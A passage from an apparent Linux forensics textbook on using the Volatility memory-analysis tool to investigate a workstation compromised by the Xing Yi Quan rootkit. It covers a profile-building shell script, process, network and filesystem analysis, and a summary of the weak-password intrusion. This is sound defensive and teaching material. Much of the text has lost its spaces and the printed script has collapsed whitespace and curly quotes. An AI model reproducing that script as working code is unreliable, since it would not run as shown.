WewillonlycoverpartsofVolatilitythatapplytoLinuxsystems.WewillnotdelvetoodeeplyintosomeofthetheorybehindhowVolatilityworkseither.Ourfocusisonusingthetool.IfyouarerunningaDebian-basedLinux,Volatilitymightbeavailableinstandardrepositories, in which case it can be installed using sudo apt-get installvolatility volatility-profiles volatility-tools. If you need toinstall from source, download the latest version source archive fromhttp://volatilityfoundation.org, uncompress it, then install it by typing sudo./setup.pyinstallfromthemainVolatilitydirectory.
CREATINGAVOLATILITYPROFILEVolatilitymakes use of internal operating system structures. The structures can changefromoneversionofanoperatingsystemtothenext.Volatilityshipswithasetofprofilesfrom common versions ofWindows. The same is not true for Linux, however. Beforerushingtojudge,stoptothinkabouthowmanydifferentkernelversionsandvariantsofLinuxexistintheworld.
The solution forLinux systems is to create your ownprofile by compiling a specificprogram;creatingadwarffile;gettingasystemmapfile;andzippingeverythingtogether.Ifthissoundscomplicatedandcumbersome,itis.Neverfear,however,asIwillshowyouhowtocreatetheprofilefromyourmountedsubjectimageusingashellscript.Thisscript
shouldbeplacedinthesamedirectoryastheVolatilitymodule.candMakefile,whichcanbefoundinthetools/linuxdirectoryinsideofthevolatilityhierarchy.Thescriptfollows.#!/bin/bash
#
#create-profile.sh
#
#SimplescripttocreateamakefileforaVolatilityprofile.
#Intendedtobeusedwithanimagefile.
#AsdevelopedforPentesterAcademy
#byDr.PhilPolstra(@ppolstra)
usage(){
echo“ScripttocreateaVolatilityprofilefromamountedimagefile”
echo“Usage:$0<pathtoimageroot>”
exit1
}
if[$#-lt1];then
usage
fi
oldir=$(pwd)
cd${1}/boot
ver=$(lsSystem.map*|sed“s/System.map-//”|tr“\n”“|”\
|sed-nr‘s/([a-zA-Z0-9\.\-]+\|)*([a-zA-Z0-9\.\-]+\|)$/\2/p’\
|sed“s/|/\n/”)
cd“${oldir}”
echo“Version:${ver}”
PWD=$(pwd)
MAKE=$(whichmake)
cat<<EOF>Makefile.${ver}
obj-m+=module.o
-includeversion.mk
all:dwarf
dwarf:module.c
${MAKE}-C${1}/lib/modules/${ver}/build\
CONFIG_DEBUG_INFO=yM=”${PWD}”modules
dwarfdump-dimodule.ko>module.dwarf
${MAKE}-C${1}/lib/modules/${ver}/buildM=”${PWD}”clean
clean:
${MAKE}-C${1}/lib/modules/${ver}/buildM=”${PWD}”clean
rm-fmodule.dwarf
EOF
#makethedwarffile
make-fMakefile.${ver}
#copytheSystem.mapfile
cp${1}/boot/System.map-${ver}./.
#nowmakethezip
zipLinux${ver}.zipmodule.dwarfSystem.map-${ver}
Let’s walk through this script. It begins with the standard she-bang, usage, andcommand line parameter count check. The current directory is saved on the lineoldir=$(pwd), before changing to the subject’s /bootdirectory.Thenextpart of thescriptattemptstoguessthecorrectkernelversionbasedonthenameoftheSystem.mapfile.Thisiscomplicatedbythefactthattheremaybemorethanonekernelinstalled.
For thepurposesof thisscript,wewillassumethesubject is running the latestkernelversioninstalled.Thisisanotherreasonyoushouldrununame-aonthesubjectsystembefore shutting it down. What makes the line determining the kernel version socomplicatedisthepossibilityofhavingmorethanoneSystem.mapfile.Let’sbreakdownthever=…line.
ThefirstcommandislsSystem.map*whichcausesalloftheSystem.mapfilestobe output one per line. The next command,sed“s/System.map-//”, substitutes“System.map-”fornothingwhichessentiallystripsoff theprefixand leavesusawithalist of kernel versions, one per line. The third command, tr“\n” “|”, substitutes(translates)newlinecharacterstoverticalpipeswhichputsallversionsonthesameline.Thefourthcommandcontainsalongregularexpressionandasubstitutioncommand.
Ifyouexaminetheregularexpression,itconsistsoftwopieces.Thefirstpart,“([a-zA-Z0-9\.\-]+\|)*”,matcheszeroormoreletters,periods,numbers,anddashesthatprecedaverticalpipe.Whencombinedwiththesecondpart,whichisidenticalexceptforthefactthatthe“*”hasbecomea“$”,whichcausesthesecondparttomatchthelastitem(versionwith vertical pipe appended), the first part effectivelymatches all but the lastitem.Thesubstitutioncommand“/\2/”causes thesecondmatch(latestversion) tobesubstituted for the entire string. Finally, one last sed command is run to change theverticalpipebacktoanewline.
Oncetheversionhasbeendetermined,thescriptchangesbacktotheoriginaldirectorywiththelinethatreadscd“${oldir}”.Theversionisechoedtothescreen.Notethattheenvironmentvariableshavebeenenclosed incurlybracketsas this tends tobesaferthanusingbarevariables, i.e.$oldir,as thesearesometimesmisinterpreted.Thecurrentworking directory and full path to themake command are then saved in the PWD andMAKEenvironmentvariables,respectively.
Thelinecat<<EOF>Makefile.${ver}isslightlydifferentfromourprevioususeofcat<<EOF. Herewe have directed the output ofcat to a file instead of theterminaloranotherprogram.The lines that follow, through“EOF”,areused tocreateamakefile. For those not familiarwithmakefiles, they are used tomore efficiently buildsoftwarebyonlyrebuildingwhatisnecessary.Thegeneralformatforamakefileisaline
thatreads<target>:[dependencies]followedbyatabindentedlistofcommandstobuildthetarget.Theindentedlinesmustusetabsandnotspacesinorderforthemakeutilitytoproperlyinterpretthem.
Normallyamakefileisusedbysimplytypingmake[target]. Inorder tousethisform ofmake, a file namedMakefile must be present in the current directory. The -foption formake allows specificationof an alternatemakefile.This is preciselywhat isdoneinthisscript.Thelastlinesofthescriptrunmaketocreateadwarffile;copiestheSystem.map file from the subject system; and then creates a zip file that is used byVolatilityasaprofile.TheoutputfromthisscriptisshowninFigure8.1.
FIGURE8.1
UsingashellscripttocreateaVolatilityprofile.
Once the profile is built, copy it to the volatility/plugins/overlays/linux directory. Formy laptop, the full path is /usr/local/lib/python2.7/dist-packages/volatility-2.4-py2.7.egg/volatility/plugins/overlays/linux.As shown inFigure8.2, anyvalidzip file inthisdirectorybecomesavalidVolatilityLinuxprofile.Thecommandvol.py–inforunsVolatilityandlistsallavailableprofilesandotherinformation.Ifyoupipetheresultstogrep, like sovol.py–info|grepLinux, itwill give you a list ofLinuxprofiles(plusacoupleotherthings)asshowninthefigure.
FIGURE8.2
VolatilityLinuxprofiles.Thehighlightedlinesshowprofilesautomaticallyloadedbasedonthezipfilesinthisdirectory.
GETTINGPROCESSINFORMATIONThesyntax for runningacommand inVolatility isvol.py–profile=<profile>-f <image file> <command>, i.e. vol.py –profile=LinuxUbuntu-14_04-3_16_0-30x64 -f ~/cases/pfe1/ram.lime linux_pslist. Ifyouplanonusingscriptstolookatprocessinformation(oranythingforthatmatter)usingVolatility, you can store this obnoxiously long command,with profile and path to yourRAMimage,inavariable.
If youplanon runningmore thanonevolatility commandon the command line, youmightconsiderusingthealiasutilitytospareyourselfthepainofrepeatedlytypingallofthis(andlikelyfat-fingeringitatleastafewtimes).Thegeneralsyntaxforthealiascommand isaliasshortcut=”reallylongcommandthatyoudon’twanttotype”. Ifyouput thiscommandinyour .bashrcfile(locatedinyourhomedirectory)orotherstartupfile,itwillbeavailabletoyoueachtimeyoulogin.Ifyouwanttousethealiaswithoutloggingoutafterediting.bashrc,youmustsourcethe.bashrcfilebytyping.~/.bashrc.Theappropriatelinethathasbeenaddedtowardtheendofthe.bashrcfile(whichishighlighted)andthesourcingof.bashrcareshowninFigure8.3.
FIGURE8.3
CreatinganaliastomoreeasilyrunVolatility.Thehighlightedlineneartheendofthe.bashrcfilecreatestheappropriatealias.
AllofthesupportedLinuxcommandsbeginwith“linux_”.Typingvol.py–info|greplinux_ should produce a complete list of available Linux commands. PartialoutputfromrunningthiscommandisshowninFigure8.4.AsofVolatility2.4thereare66ofthesecommands.It isimportanttokeepinmindthatmemoryanalysisisasomewhatnewfield.Asaresult,itisnotuncommonforsomeoftheseVolatilitycommandstofail.
FIGURE8.4
SomeoftheavailableVolatilityLinuxcommands.
Volatility provides a number of process commands for Linux systems. One of thesimplestislinux_pslistwhichproducesalistoftasksbywalkingthetasklist.Thiscommand outputs the process name, process ID, user ID, and group ID (along with acoupleotherfieldsthatyoulikelydon’tneed).PartialoutputfromrunningthiscommandagainstourPFEsubjectsystemisshowninFigure8.5.ThehighlightedrowshowsashellassociatedwiththeXingYiQuanrootkitrunningwithrootprivilegesinprocess3027.
FIGURE8.5
Partialoutputof theVolatility linux_pslistcommand.Thehighlighted rowshowsa rootkit shell runningwithadministrativeprivileges.
Another command for listing processes islinux_psaux. This command is namedafterps-aux,whichisafavoritecommandforpeoplewhowanttogetalistingofallprocesses completewith command lines.Partial output from this command is shown inFigure 8.6. The highlighted lines show how a root shell was created with sudo -s(process 3034); which caused bash to run as root (process 3035); and then the LiMEmodulewasinstalled(process3073)inordertodumptheRAM.
FIGURE8.6
PartialoutputfromrunningtheVolatilitylinux_psauxcommandagainstthePFEsubjectsystem.
Thetwoprocesscommandspresentedthusfaronlyshowtheprocessesinisolation.Toget information on the relationship of processes to each other, the linux_pstreecommandcanbeused.Thiscommandwillshowprocesseswithanysubprocesses listedunderneath and preceded by a period. Nested processes will have multiple periodsprepended to their names. Not surprisingly, almost everything is a subprocess of init,whichhasaprocess IDof1as it is the first thingexecutedatboot time.Partialoutputfromrunningthiscommandagainst thePFEsubjectsystemisshowninFigure8.7.ThehighlightedportionclearlyshowsthecreationoftherootshellbytheuserwithID1000whichwasthenusedtodumptheRAMwithLiME.
FIGURE8.7
Partial results from running the Volatility linux_pstree command against the PFE subject system. ThehighlightedoutputshowstherelationshipsofprocesseshighlightedinFigure8.6.
Whilethelinux_psauxcommandisniceandprovidesalotofinformation,thereisanother command that can provide even more information. That command islinux_psenv. This command lists the full process environment for every displayedprocess.Becausethiscommandwillgeneratealotofoutput,youmaywishtousethe-poption,whichallowsyoutoprovideacommadelimitedsetofprocessidentitynumbers.Forhelponthis,oranyotherVolatilitycommand,runvol.py<command>-hforabriefhelpscreen.Thelastpartofthishelpscreenforlinux_psenvaswellastheresultsofrunninglinux_psenvontheprocessassociatedwiththerootkitareshowninFigure8.8.
FIGURE8.8
Partial results of running vol.py linux_psenv -h and results of running this command on the processassociatedwitharootkit.
The-poptionfromthehelpscreenishighlightedinFigure8.8.LookingatthebottomofthefigureweseethatthisprocesswasexecutedbythejohnuserwithuserID1000,andthat sudo was used. This does not necessarily mean that John was involved in thecompromise.Rather,thistellsusthathisaccountwasused.Thereareanumberofreasonsthathisaccountmayhavebeenused.Hemighthavebeentargetedbysomeonethatknewhehadadministrativeprivileges.Itisalsoquitepossiblethathehasaweakpasswordthattheattackerwasabletocrack.
Volatilityprovidesacross-referencecommandforprocessescalledlinux_psxview.Whywouldyouwantsuchacommand?Somemalwarewillattempttohideitsprocessesfrom view by altering internal kernel structures. By comparing (cross-referencing) thevarious structures, inconsistencies related tomalware aremore easily identified. PartialresultsofrunningthiscommandagainstthePFEsubjectsystemareshowninFigure8.9.Inthiscasenothingunusualwasnoted.
FIGURE8.9
Partialresultsfromrunninglinux_psxviewagainstthePFEsubjectsystem.
PROCESSMAPSANDDUMPSIn the previous section we saw how Volatility can be used to get lists of processesincludingdetailedinformationoneachprocess.InthissectionwewillexaminehowtouseVolatility to determine how processes are laid out (mapped) in memory. The firstcommandwewilldiscussislinux_proc_maps.TheresultsofrunningthiscommandagainsttherootkitprocessonthePFEsubjectsystemareshowninFigure8.10.
FIGURE8.10
Gettingaprocessmapfortherootkitprocess.
The linux_proc_maps command displays memory segments used by a process.Noticethateachsegmenthasflags(permissions)associatedwithit.WhatyouwillnotseeonLinux(intheoryatleast)isasegmentthatisbothwritableandexecutableasthiswouldopen thedoor foranattacker to rewritecode inaprocessand then runmaliciouscode.Noticethatifafileisassociatedwithachunkofmemory,itsinodeandfilepatharealsodisplayed. Inotherwords, the filesystemanalysisperformed inpreviouschapters is stillapplicablewhenanalyzingmemory.
Therootkitappearstobeloadedatthestandardplaceof0x400000.Ithasacoupleofadditionalsegments,oneofwhichisreadonly.Thereisalsoaheapassociatedwiththisprogram.Acoupleofsharedlibraries,whichalsohavesomeextramemorysegments(forstoringtheirvariables),areloadedhigherupinmemory.Theprogramstack(whichgrowsdownward)isalsointhehighermemorylocations.Thereisanalternativecommandtogetthis information, linux_proc_maps_rb. This command uses the balanced treestructuresused tomapmemoryas the sourceof itsdata.These treesarealsoknownasred-blacktrees,whichisthereasonforthe_rbsuffix.
ThefactthattheClibraryisloadedsuggeststhatthisrootkitwaswritteninCorC++.This can’t be provenwithout analyzing the code, however, as it is possible to load thislibraryeveniftherootkitwaswritteninanotherlanguagesuchasAssembly.Howcantherootkitbeexamined?TheVolatilitylinux_procdumpcommandcanbeusedtodumpaprocessesmemorytoafile.Wewilldiscusswhattodowithsuchafilelaterinthisbookwhenwediscussmalwareanalysis.
Thelinux_procdumpcommandacceptsanoptionalprocessIDlistandrequiresan
outputdirectorywhichisspecifiedwiththe-D(or–directory=)option.Figure8.11showstheresultsfromrunninglinux_procdumponourrootkitprocessandprintingoutthefirstpartoftheresultingdump.WecanseethatthisisanExecutableLinkableFile(ELF)thathasbeenloadedintomemoryfromthefirstfourbytesinthedump.
FIGURE8.11
ResultsofrunningtheVolatility linux_procdumpcommandontherootkit fromthePFEsubjectsystem.ThefirstfourbytesofthedumpindicatethisisanexecutableinELFformat.
GETTINGBASHHISTORIESEarlierinthisbookwediscussedhowtogetusers’bashhistoriesfromtheirhistoryfiles.We can also get the bash history information from the bash processmemory itself.Asdiscussedpreviously,asophisticatedattackermightdeletethehistoryfilesand/orsetthehistory size to zero. The history size is determined by the HISTSIZE environmentvariable, which is normally set in the .bashrc file (default value is 1000). Even if thehistoryisnotbeingsavedtodisk,itisstillpresentinmemory.
The Volatility command for retrieving bash histories from bash process memory islinux_bash.PartialresultsfromrunningthiscommandagainstthePFEsubjectsystem,with suspicious activity highlighted, are shown in Figure 8.12 and Figure 8.13. Manyotheractionsbytheattackerwerefoundthatarenotdisplayedinthefigures.
FIGURE8.12
Partialresultsfromrunninglinux_bashagainstthePFEsubjectsystem.Thehighlightedportionshowswhereanattackerattemptedtomodifythe/etc/passwordfileaftermovingthebogusjohnnuser’shomedirectory.
FIGURE8.13
Partialresultsfromrunninglinux_bashagainstthePFEsubjectsystem.Thehighlightedportionshowswhereanattackermovedahomedirectoryforanewlycreateduserandsetpasswordsforsystemaccounts.
Just as we have a command for retrieving the environment for any process,
linux_psenv, there is a Volatility command that returns the environment for anyrunning bash shell. This command is called linux_bash_env. Partial results fromrunningthiscommandareshowninFigure8.14.FromtheUSERvariableineachofthebashshellsshowninthefigure,wecanseethatoneshellisrunbythejohnuserandtheotherisrunbyroot.Itislikelythatthejohnuserstartedthesecondshellwithsudo-s.
FIGURE8.14
PartialoutputfromrunningtheVolatilitylinux_bash_envcommandagainstthePFEsubjectsystem.
Whenacommandisrunforthefirsttimeinabashshell,bashmustsearchthroughtheuser’spath(storedinthePATHenvironmentvariable).Becausethisisatimeconsumingprocess,bashstoresfrequentlyruncommandsinahashtabletoalleviatetheneedtofindprogramseachtime.Thishashtablecanbeviewed,modified,andevenclearedusingthehashcommand.Volatilityprovidesthecommandlinux_bash_hashforviewingthisbash hash table for each bash shell in memory. The results of running this commandagainstthePFEsubjectsystemareshowninFigure8.15.
FIGURE8.15
ResultsfromrunningtheVolatilitylinux_bash_hashcommandagainstthePFEsubjectsystem.
VOLATILITYCHECKCOMMANDSVolatilitycontainsseveralcommandsthatperformchecksforvariousformsofmalware.Many of these commands are of the form linux_check_xxxx. In general, Volatilitycommands can take a long time to run, and these check commands seem to take thelongesttime.Howlongisalongtime?Figure8.16showsascreenshotfromanattempttorun the linux_apihooks command, which is used to detect userland API hooks,against thePFEsubject system.After threehoursofprocessing the small (2GB)RAMimageonmyi7laptopwith8GBofmemory,thecommandstillhadn’tcompleted.
FIGURE8.16
AverylongrunningVolatilitycommand.Thecommandwasabortedafterithadnotcompletedinnearlythreehours.
Ifyoususpect that thefunctionpointers fornetworkprotocolsonasystemhavebeenmodified,thelinux_check_afinfocommandwillcheckthesefunctionpointersfortampering.Thiscommandreturnedno resultswhenrunagainst thePFEsubject system.The linux_check_creds command is used to detect processes that are sharingcredentials.Those familiarwithWindowsmayhaveheardofpass-the-hashorpass-the-tokenattacks, inwhichanattackerborrowscredentials fromoneprocess to runanotherprocesswithelevatedprivileges.This commandchecks for theLinuxequivalentof thisattack.RunningthiscommandagainstthePFEsubjectsystemalsoproducednoresults.
Thelinux_check_fopcommandcanbeusedtocheckfileoperationstructuresthatmayhavebeenalteredbya rootkit.Onceagain, running thiscommandagainst thePFEsubject system produced no results. This is not surprising. The rootkit installed on thissystem hides itself with a method that doesn’t involve altering the file operationcommands(rather,thedirectoryinformationismodified).
Many readers are likely familiar with interrupts. These are functions that are calledbased on hardware and software events. The function that is called when a particularinterrupt fires is determined by entries in the Interrupt Descriptor Table (IDT). TheVolatilitycommandlinux_check_idtallowstheIDTtobedisplayed.Theresultsofrunning thiscommandagainst thePFEsubjectsystemareshowninFigure8.17.Noticehowalloftheaddressesareclosetoeachother.Asignificantlydifferentaddressinanyoftheseslotswouldbesuspicious.
FIGURE8.17
ResultsfromrunningtheVolatilitylinux_check_idtcommandagainstthePFEsubjectsystem.
The kernel mode counterpart to the linux_apihooks command islinux_check_inline_kernel. This command checks for inline kernel hooks. Inotherwords, thisverifies thatkernelfunctioncallsaren’tbeingredirectedtosomewhereelse.RunningthiscommandagainstthePFEsubjectsystemproducednoresults.
Volatility provides the linux_check_modules function which will compare themodulelist(storedin/proc/modules)againstthemodulesfoundin/sys/module.Rootkitsmight be able to hide by altering thelsmod commandor other internal structures, buttheyalwaysmustexistsomewhereinakernelstructure.ThiscommandalsoproducednoresultswhenrunagainstthePFEsubjectsystem.
WhileWindowsusesanAPI,Linuxcomputersutilizesystemcallsformostoperatingsystemfunctions.Likeinterrupts,systemcallsarestoredinatableandarereferencedbynumber. The mapping of numbers to functions is stored in system headers. Thelinux_check_syscallcommandwillcheckthesystemcall tableforalterations. Ifsomething has been changed, “HOOKED” is displayed after the index and the address.Otherwise,thenormalfunctionnameisdisplayed.On64-bitsystemstherearetwosystemcall tables. One table is for 64-bit calls and the other for 32-bit calls. Running thiscommand against the PFE subject system revealed that the 64-bit open, lstat, dup, kill,getdents,chdir,rename,rmdir,andunlinkatsystemcallshadallbeenhookedbytheXingYiQuanrootkit.
Volatilityprovidestwocommandsfordetectingkeylogging:linux_check_ttyandlinux_keyboard_notifiers. Each of these checks for well-documented keyloggingtechniques.Thefirstchecksforinterceptionattheterminaldevicelevel,andthe
second verifies that all processes on the keyboard notifier list are in the kernel addressspace (user address space indicates malware). If a problem is detected, the word“HOOKED”isdisplayed.TheresultsofrunningthesetwocommandsareshowninFigure8.18.NokeyloggerwasdetectedonthePFEsubjectsystem.
FIGURE8.18
RunningVolatilitykeyloggingdetectioncommandsagainstthePFEsubjectsystem.
GETTINGNETWORKINGINFORMATIONMany types of malware will attempt to exfiltrate data and/or use some form ofinterprocess communication (IPC). These activities usually involve some sort ofnetworking.Volatilityallowsyoutogetvarioustypesofnetworkinginformation,inordertohelpyoulocatemalware.
The Linuxifconfig command is used to list network interfaces along with theirMACandIPaddresses,etc.TheVolatilitylinux_ifconfigcommandwillprovidealistofnetworkinterfaceswithIPaddress,MACaddress,andwhetherornotpromiscuousmodeisenabled.Asareminder,packetsreceivedonaninterface thatareforadifferentinterfacearenormallydropped.Aninterfaceinpromiscuousmodemaybeusedforpacketsniffingasnopacketsaredropped.TheresultsofrunningthiscommandagainstthePFEsubjectsystemareshowninFigure8.19.Nothingunusualisseenhere.
FIGURE8.19
ResultsofrunningtheVolatilitylinux_ifconfigcommandagainstthePFEsubjectsystem.
Once thenetwork interfacesareknown,you should lookatopenportson the subjectmachine.OnLinuxsystemsthenetstatcommandisoneofmanytoolsthatwillreportthis type of information. The Volatility linux_netstat command provides similarinformation.Readers are likely familiarwith TCP andUDP sockets. Somemay not befamiliar withUNIX sockets, which are also reported bynetstat. AUNIX socket isusedforinterprocesscommunicationonthesamemachine.IfyoulookatatypicalLinuxsystem itwill have a lot of these sockets in use.Don’t overlook these sockets in yourinvestigation,astheycouldbeusedforIPCbetweenmalwarecomponentsorasawaytointeractwithlegitimatesystemprocesses.
Becausethelinux_netstatcommandreturnssomuchinformation,youmightwantto combine it with grep to separate the various socket types. Results from running thelinux_netstatcommandwith theresultspiped togrepTCPareshowninFigure8.20.Thehighlightedlineshowsarootkitshellislisteningonport7777.WecanalsoseeSecure Shell (SSH) and File Transfer Protocol (FTP) servers running on thismachine.There are dangers associatedwith running an FTP server.One of these is the fact thatlogins are unencrypted, which allows for credentials to be easily intercepted. Onlinepasswordcrackingagainst theFTPserverisalsomuchquickerthanrunningapasswordcrackeragainstSSH.ThisFTPservercouldhaveeasilybeenthesourceofthisbreach.
FIGURE8.20
TCPsocketsonthePFEsubjectsystem.
Theresultsfromrunninglinux_netstatagainstthePFEsubjectsystemandpipingthemtogrepUDPareshowninFigure8.21.PartialresultsofrunningthiscommandandpipingoutputtogrepUNIXareshowninFigure8.22.Notsurprisingly,alargenumberof UNIX sockets are being used by operating system and X-Windows components.Nothingoutoftheordinaryisseenhere.
FIGURE8.21
UDPsocketsonthePFEsubjectsystem.
FIGURE8.22
PartiallistingofUNIXsocketsonthePFEsubjectsystem.
Linux provides an extensive system, known as netfilter, for filtering out variousnetworkingpackets.Netfilterallowsasetofhookstobecreatedatvariouspointsinthenetworkflow,suchaspre-routing,post-routing,etc.Acompletediscussionofnetfilteriswellbeyond thescopeof thisbook.TheVolatilitylinux_netfiltercommandwilllistnetfilterhooksthatarepresent.RunningthiscommandagainstthePFEsubjectsystemrevealed a pre-routing hook with an address similar to that of the system call hookscreatedbytheXingYiQuanrootkit.
TheAddressResolutionProtocol(ARP)isusedtotranslateMAC(hardware)addressesto IP addresses. Some attacks work by altering the ARP table and/or by abusing ARPprotocols. Volatility provides thelinux_arp command for printing ARP tables. TheresultsofrunningthiscommandagainstthePFEsubjectsystemareshowninFigure8.23.Thereappearstobenothingamisshere.
FIGURE8.23
TheARPTablefromthePFEsubjectsystem.
Sockets operating in promiscuous mode can be listed with the Volatilitylinux_list_raw command.Running this command against the PFE subject systemonlyshowedthetwoDynamicHostConfigurationProtocol(DHCP)clients.Therearetwobecause each network interface using DHCP has its own process. In other words, thisrevealednothingabnormal.
GETTINGFILESYSTEMINFORMATIONTheprevious,quite lengthy,chapterdealtwith filesystems.Youmightwonderwhyyouwoulduseamemoryanalysistooltoinspectfilesystems.Thereareacoupleofreasonsfordoing this. First of all, knowing what filesystems have been mounted can be helpful.Secondly,manymodernLinuxsystemsmakeuseoftemporaryfilesystemsthatgoawaywhenthesystemisshutdown.AtoollikeVolatilitymaybetheonlywaytorecoverthesetemporaryfilesystems.
TheVolatilitylinux_mount command lists allmounted filesystems completewithmountoptions.Theresultsfromthiscommandallowyoutodetectextrathingsthathavebeenmounted, and also filesystems that have been remounted by an attackerwith newoptions. Partial results from running this command against the PFE subject system areshown in Figure 8.24. The FAT (/dev/sdb1) and ext4 (/dev/sdb2) partitions from myresponsedriveusedtoloadLiMEcanbeseeninthefigure.
FIGURE8.24
PartialresultsfromrunningtheVolatilitylinux_mountcommandagainstthePFEsubjectsystem.
Not surprisingly, Linux caches recently accessed files. The Volatilitylinux_enumerate_filescommandallowsyoutogetalistofthefilesinthecache.This can help youmore easily locate interesting fileswhen performing your filesystemanalysis.AscanbeseenfromFigure8.25,thejohnuserhasalotoffilesassociatedwiththerootkitinhisDownloadsfolder.Thiscommandproducesalotofoutput.Tohomeinon particular directories, youmightwant to pipe the results toegrep‘^<pathofinterest>’, i.e.egrep‘^/tmp/’.The “^” in the regular expression anchors thesearch pattern to the start of the line which should eliminate the problem of otherdirectories and files that contain the search string appearing in your results. Note thategrep(extendedgrep)mustbeusedfortheanchortoworkproperly.Partialresultsfrompipingthecommandoutput toegrep‘^/tmp/’areshowninFigure8.26.Notice thereareseveral filesassociatedwith the rootkithere, including#657112,#657110,and#657075whichareinodenumbersassociatedwiththerootkitfiles.
FIGURE8.25
Rootkitfilesinthefilesystemcache.
FIGURE8.26
PartialresultsofrunningtheVolatility linux_enumerate_filescommandagainst thePFEsubjectsystemandpipingtheoutputtoegrep‘^/tmp/’.
Oncefilesinthecachehavebeendiscoveredusinglinux_enumerate_files,theVolatilitylinux_find_filecommandcanbeusedtoprintouttheinodeinformation.
This command can alsobeused to extract the file.Toget the inode information the -F<full path to file> optionmust be used.Unfortunately, the -F option doesn’t appear tosupportwildcards.Once the inode number and address is found,linux_find_filecanbererunwiththe-i<addressofinode>-O<outputfile>options.Thefullprocessofrecovering the /tmp/xingyi_bindshell_port file is shown inFigure8.27.From the figurewecanseethatthisfilestoresthevalue7777,whichcorrespondstoourearlierdiscoveryinthenetworkingsectionofthischapter.
FIGURE8.27
RecoveringafilewithVolatility.
MISCELLANEOUSVOLATILITYCOMMANDSAs we said at the beginning of this chapter, we have not covered every one of the
VolatilitycommandsforLinuxsystems.Thereareacoupleofreasonsforthis.First, theavailable commands are not equally useful. Some might only be occasionally helpful.Second,Ihavefoundthatlaterkernelsarenotwell-supportedbyVolatility.Someofthecommandswillfailspectacularly,whileotherswillproduceanunsupportederrormessageandexitgracefully.Forcompleteness,IhavelistedadditionalLinuxcommandsinTable8.1.
Table8.1AdditionalVolatilitycommandsnotdiscussedinthischapter.
Command Description Notes
linux_banner PrintsLinuxbannerinformation Similartouname-acommand
linux_check_evt_arm CheckExceptionVectorTable ARMarchitectureonly
linux_check_syscall_arm Checksystemcalltable ARMarchitectureonly
linux_cpuinfo PrintCPUinfo GivesCPUmodelonly
linux_dentry_cache Usedentrycachetomaketimeline Likelyfailswithrecentkernels
linux_dmesg Printdmesgbuffer Sameascat/var/log/dmesg
linux_dump_map Writesmemorymapstodisk Goodformalwareanalysis
linux_elfs PrintELFbinariesfromprocessmaps Lotsofoutput(toomuch?)
linux_hidden_modules Carvesmemoryforkernelmodules FoundXingYiQuanrootkit
linux_info_regs PrintCPUregisterinfo Failsfor64-bitLinux
linux_iomem Similartorunningcat/proc/iomem Displaysinput/outputmemory
linux_kernel_opened_files Listsfilesopenedbykernel
linux_ldrmodules Compareprocmapstolibdl Lotsofoutput
linux_library_list Listslibraryusedbyaprocess Usefulformalwareanalysis
linux_library_dump Dumpssharedlibrariestodisk Use-ptogetlibsforaprocess
linux_lsmod Printloadedmodules Similartolsmodcommand
linux_lsof Listsopenfiles Similartolsofcommand
linux_malfind Lookforsuspiciousprocessmaps
linux_memmap Dumpthememorymapforatask Usefulformalwareanalysis
linux_moddump Dumpkernelmodules Usefulformalwareanalysis
linux_mount_cache Printmountedfilesystemsfromkmem_cache Likelyfailsforrecentkernels
linux_pidhashtable EnumeratesprocessesbasedonthePIDhashtable
linux_pkt_queues Dumpper-processpacketqueues Likelyfailsforrecentkernels
linux_plthook ScanELFProceedureLinkageTable Usefulformalwareanalysis
linux_process_hollow Checkforprocesshollowingwhichistechniqueforhidingmalwareinsidealegitimateprocess
Candiscovermalware.Requiresbaseaddresstobespecified.
linux_pslist_cache Listsprocessesusingkmem_cache Likelyfailsforrecentkernels
linux_recover_filesystem Recoverstheentirecachedfilesystem Likelyfailsforrecentkernels
linux_route_cache Recoversroutingcachefrommemory(removedinkernel3.6)
Likelyfailsforrecentkernels
linux_sk_buff_cache Recoverspacketsfromkmem_cache Likelyfailsforrecentkernels
linux_slabinfo Printsinfofrom/proc/slabinfo Likelyfailsforrecentkernels
linux_strings Searchesforlistofstringsstoredinafile Takesalongtimetorun
linux_threads Printsthreadsassociatedwithprocesses Usefulformalwareanalysis
linux_tmpfs Recovertmpfsfrommemory Likelyfailsforrecentkernels
linux_truecrypt_passphrase RecoverTruecryptpassphrases
linux_vma_cache RecoverVirtualMemoryAreas Likelyfailsforrecentkernels
linux_volshell PythonshellwhichallowsVolatilityscriptstoberuninteractively
UnlessyouknowadecentamountofPython,youwilllikelyneverusethis.
linux_yarascan UseYARArulestolocatemalware Usefulformalwareidentification
AsyoucanseefromTable8.1,manyoftheVolatilitycommandsforLinuxdon’tworkwith recent kernels. The remaining commands are predominantly used for malwareanalysis.Youmight see some of them inChapter 10wherewe delve a bit deeper intomalware.
SUMMARYIn this chapter we have introduced the most commonly used Volatility commands forincidentresponseonaLinuxsystem.Wesawthatmanyofthesecommandsreturnednoadditional information about the attack onPFE’s computer. In the next chapterwewilldiscusshowthissituationchangeswhentheattackerusessomemoreadvancedtechniquesthanthoseemployedinthePFEhack.
CHAPTER
9DealingWithMoreAdvancedAttackersINFORMATIONINTHISCHAPTER:
SummaryofanunsophisticatedattackLiveresponseMemoryanalysisofadvancedattacksFilesystemanalysisofadvancedattacksLeveragingMySQLReportingtotheclient
SUMMARYOFTHEPFEATTACKUptothispointinthebook,wehavediscussedarathersimpleattackagainstadeveloperworkstationatPFE.Afterfinishingyourinvestigationyoudeterminedthatthebreachwascausedby the johnuserhavingaweakpassword. It seems that inearlyMarch2015anattacker realized that the subject systemhad a johnuserwith administrative access andwasconnectedtotheInternetwhileexposingSSHandFTPservers.
It isdifficult tosayexactlyhowtheattackercame tohave thisknowledge.HeorshemighthavedonesomeresearchonthecompanyandmadesomereasonableguessesaboutMr.Smith’susernameandlikelylevelofaccessonhisworkstation.Theattackerdoesn’tappeartohavesniffedJohn’susernamedirectlyfromtheFTPserver,astherewouldhavebeennoneed tocrack thepassword if thiswere thecase, since the login information issentunencrypted.
You can tell that the username was known, but the password was not, because theattackerusedHydra,orasimilaronlinepasswordcracker,torepeatedlyattempttologinasthe johnuseruntilheor shewassuccessful.The fact that successcamequickly for theattackerwasprimarily the resultofMr.Smithchoosingapassword in the top50worstpasswords.Thelogsrevealthatnootherusernameswereusedintheattack.
Once logged in as John, the attacker used his administrative privileges to setup thebogus johnn account, modify a couple of system accounts to permit them to log in,overwrite/bin/falsewith/bin/bash,andinstalltheXingYiQuanrootkit.Wehaveseenthatattackerstruggleandresorttoconsultingmanpages,andotherdocumentation,alongtheway.HadMr.Smithbeenforcedtoselectamoresecurepassword,thisbreachmayneverhaveoccurred,giventheattacker’sapparentlylowskilllevel.Whatdoesincidentresponse
